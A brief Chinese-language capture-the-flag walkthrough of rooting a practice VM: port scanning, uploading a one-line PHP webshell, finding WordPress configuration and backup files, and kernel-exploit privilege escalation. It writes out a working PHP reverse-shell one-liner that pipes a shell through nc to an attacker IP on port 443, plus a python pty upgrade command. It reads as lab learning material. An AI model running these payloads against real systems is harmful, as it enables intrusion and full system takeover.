首先配置一下虚拟机,因为 ova 格式用 VM 导入的话,是不显示 ip 的,具体配置网上都有,这里就不说了
配置成功后,在本机上使用 arp-scan -l 就可以看到靶机 ip (用来验证是否配置成功)

端口扫描

开放了 80 端口,所以直接访问看看,点点点,就发现可疑接口

写个一句话木马传上去,蚁剑连

再 WordPress 下面发现配置文件

在 /var/www/html 下有个.backup 文件

然后尝试登录系统,但是并没有发现什么有用的东西,先写个反弹 shell 吧

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.248.129 443 >/tmp/f");?>

kali 本地监听 443 端口,浏览器访问刚才创建的反弹 shell 的文件 2.php
出现下图界面即为反弹成功

升级 tty shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

查看一下内核版本

在 kali 里找一下有没有该版本的漏洞信息,果然发现

使用命令,把 .c 文件下下来,然后直接在本地 gcc 45010.c -o exp

编译完成以后我们通过 ftp 服务上传到靶机中

再回到靶机那边,给 exp 权限,最后提权成功

进入 root 目录下,发现第二个 flag
